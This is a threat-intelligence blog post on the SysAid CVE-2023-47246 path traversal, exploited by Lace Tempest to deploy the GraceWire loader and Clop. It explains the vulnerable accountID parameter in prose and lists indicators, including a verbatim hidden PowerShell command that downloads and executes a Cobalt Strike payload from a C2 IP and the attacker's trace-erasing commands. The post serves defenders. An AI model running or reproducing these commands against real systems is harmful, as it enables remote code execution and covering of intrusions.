SOCRadar® Cyber Intelligence Inc. | Path Traversal Leading to Compromise: SysAid On-Prem Software CVE-2023-47246 Vulnerability
Home

Resources

Blog
Nov 09, 2023
7 Mins Read

Path Traversal Leading to Compromise: SysAid On-Prem Software CVE-2023-47246 Vulnerability

[Update] November 15, 2023: See the subheadings: “Nuclei Template Now Available, Scan for the SysAid Vulnerability (CVE-2023-47246).”

[Update] November 14, 2023: See the subheadings: “CVE-2023-47246 in SysAid Has Been Listed in CISA’s KEV Catalog: Urgent Patching Required,” and “Proof-of-Concept (PoC) Exploit for CVE-2023-47246: How Does the SysAid Path Traversal Vulnerability Actually Work?”

On November 2nd, an alarming zero-day vulnerability was identified within the SysAid on-premises software. This discovery prompted an immediate incident response, involving communications with on-premise customers and collaboration with Profero, a cybersecurity incident response firm. The vulnerability, exploited by the hacker group DEV-0950 (Lace Tempest), presents significant risks for users of affected SysAid software versions.

Nature and Severity of the Vulnerability in SysAid (CVE-2023-47246)

This zero-day vulnerability, a path traversal flaw leading to code execution, was exploited to upload malicious files to the SysAid Tomcat web service, granting unauthorized system access and control. CVE-2023-47246 allowed the attackers to execute malicious scripts and deploy the GraceWire trojan. Given its ability to compromise system integrity, this vulnerability is deemed highly critical.

According to the blog post written by company’s CTO Sasha Shapirov, they observed that the attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service which is ‘C:Program FilesSysAidServertomcatwebappsusersfiles’.

The visual from  CTO Sasha Shapirov’s blog post, sysaid
The visual from  CTO Sasha Shapirov’s blog post

The WebShell provided the attacker with unauthorized access and control over the affected system. Then, the attacker utilized a PowerShell script, uploaded to the system via WebShell, to execute a malware loader, user[.]exe on the vulnerable server, which was used to load the GraceWire trojan. The trojan is injected it into one of the following processes:

  • spoolsv[.]exe
  • msiexec[.]exe
  • svchost[.]exe

After initial access was completed successfully, the attacker utilized a second PowerShell script to erase proves associated with his actions from the server/

Which Versions of SysAid Are Affected?

Warning that highlights urgency from CTO Sasha Shapirov’s blog post, sysaid
Warning that highlights urgency from CTO Sasha Shapirov’s blog post

Systems running SysAid on-premises software are at risk, specifically versions prior to23.3.36. The vulnerability affects the software’s webroot directory, enabling attackers to deploy a range of malicious activities.

Microsoft Reports Exploitation: Clop Ransomware Targets the SysAid Zero-Day

Microsoft has reported that the ‘Lace Tempest’ group is actively exploiting the CVE-2023-47246 zero-day vulnerability to distribute the Clop Ransomware.

While the exact initiation date of the SysAid attacks remains unknown, Joe Desimone from Elastic Security disclosed that they observed the exploitation of the vulnerability as early as October 30, 2023.

Shodan results highlight a concerning total of 419 exposed SysAid instances thus far. As this number can change with future activity, the exposure raises immediate security concerns for organizations utilizing SysAid software.

Exposed SysAid instances (Shodan)
Exposed SysAid instances (Shodan)

Clop Ransomware, responsible for attacks on MOVEit Transfer and GoAnywhere MFT, has been notorious for leveraging zero-day vulnerabilities to infiltrate systems. Given the ongoing impact of the MOVEit breach on victims, the discovery of Clop threat actors targeting the new zero-day vulnerability in SysAid adds another layer of urgency, alarming the cybersecurity community.

CVE-2023-47246 in SysAid Has Been Listed in CISA’s KEV Catalog: Urgent Patching Required

CISA has incorporated six new vulnerabilities into its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation. Among them is the CVE-2023-47246 vulnerability affecting SysAid. Federal agencies and organizations are mandated to patch this vulnerability by December 4, 2023.

Listing of the SysAid vulnerability (CVE-2023-47246) in the KEV catalog.
Listing of the SysAid vulnerability (CVE-2023-47246) in the KEV catalog.

CISA’s guidance on the KEV catalog emphasizes applying mitigations according to vendor instructions or discontinuing product use if mitigations are unavailable. Although Microsoft has previously reported that threat actors have exploited the vulnerability to distribute Clop Ransomware, as of now, CISA does not categorize the vulnerability as being used in ransomware operations.

Proof-of-Concept (PoC) Exploit for CVE-2023-47246: How Does the SysAid Path Traversal Vulnerability Actually Work?

Researchers have successfully recreated a Proof-of-Concept (PoC) exploit of the SysAid vulnerability (CVE-2023-47246). In the PoC, the researchers demonstrate the ability to write the bytes of a malicious WAR file to the web server’s root directory. It is reported that this PoC aligns with the indicators observed in the original advisories by Microsoft and SysAid. However, the researchers have decided not to release the PoC to the public at this time.

They identified the vulnerable component by decompiling Java class files and patch diffing between versions 23.3.35 and 23.3.36.

A check included in the latest SysAid version, in the doPost method (Huntress Labs)
A check included in the latest SysAid version, in the doPost method (Huntress Labs)

According to the researchers’ findings, the vulnerability resides in the doPost method within the SysAid com.ilient.server.UserEntry class, and is related to an a2 variable. This variable is derived from the accountID parameter, which constructs the path where the uploaded file will be written. By injecting a path traversal into the accountID parameter and supplying a zlib compressed WAR file webshell as the POST request body, attackers gain control over the webshell’s destination on the vulnerable server. This allows them to request the webshell by URL and subsequently access the server.

Is It Possible to Detect the Existence of the SysAid Vulnerability?

To ascertain if a system is vulnerable, check for unauthorized access or suspicious file uploads in the SysAid Tomcat web service’s webroot directory. Monitoring the processes like spoolsv[.]exe, msiexec[.]exe, and svchost[.]exe for unusual activities is also critical.

SOC teams should look for specific IOCs, such as unusual IP addresses, file hashes, and suspicious commands, to prevent exploitation. Monitoring PowerShell execution logs for abnormal activities and checking targeted processes for unusual behavior are vital.

File Hashes:

  • user[.]exe

Hash: b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d

Comment: This is the hash for the “GraceWire” malicious loader. Searching for this specific hash across your systems can help identify the presence of this loader.

IP Addresses:

  • 81.19.138[.]52

Comment: GraceWire Loader Command and Control (C2) server.

  • 45.182.189[.]100

Comment: Another GraceWire Loader C2 server.

  • 179.60.150[.]34

Comment: Cobalt Strike C2 server.

  • 45.155.37[.]105

Comment: Meshagent remote admin tool C2 server.

These IP addresses are indicative of communication with the attacker’s infrastructure. Monitoring and blocking traffic to/from these IPs can be a key part of your response.

File Paths:

  • C:Program FilesSysAidServertomcatwebappsusersfilesuser.exe

Comment: Path for the GraceWire loader.

  • C:Program FilesSysAidServertomcatwebappsusersfiles.war

Comment: Archive containing WebShells and tools used by the attacker.

  • C:Program FilesSysAidServertomcatwebappsleave

Comment: A flag used by the attacker’s scripts during execution.

Monitoring for changes, creations, or executions from these paths can reveal malicious activity.

Commands:

  • CobaltStrike Execution:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)

This PowerShell command downloads and executes a CobaltStrike listener, indicating a significant breach.

  • Post-Compromise Cleanup Commands:

These commands are used by the attacker to clear traces of their presence.

Remove-Item -Path “$tomcat_dirwebappsusersfilesleave”.

Remove-Item -Force “$wappsusersfiles.war”.

Remove-Item -Force “$wappsusersfilesuser.*”.

& “$wappsusersfilesuser[.]exe”.

  • Antivirus Detections (Microsoft Defender Identifications):

Trojan:Win32/TurtleLoader

Backdoor:Win32/Clop

Ransom:Win32/Clop

The vulnerability has been actively exploited by the DEV-0950 (Lace Tempest) group, deploying the GraceWire loader and potentially other malicious tools.

Nuclei Template Now Available, Scan for the SysAid Vulnerability (CVE-2023-47246)

A Nuclei template has been released for the CVE-2023-47246 vulnerability affecting SysAid. This template facilitates scanning for the SysAid vulnerability and enhancing your security measures.

You can access the Nuclei template on the official GitHub repository maintained by ProjectDiscovery. You can also access the template at its direct URL.

SOCRadar’s Role in Addressing the Issue

SOCRadar can assist in tackling this vulnerability through its XTI solution, providing enhanced threat intelligence and monitoring capabilities. It aids in identifying and responding to threats related to this vulnerability effectively.

SOCRadar Company Vulnerabilities/Attack Surface Management (ASM)
SOCRadar Company Vulnerabilities/Attack Surface Management (ASM)

The discovery of these zero-day vulnerabilities like in SysAid’s on-premise software underscores the need for vigilant cybersecurity practices. Prompt updating to the latest software version and thorough compromise assessments are imperative steps in protecting against this severe security threat.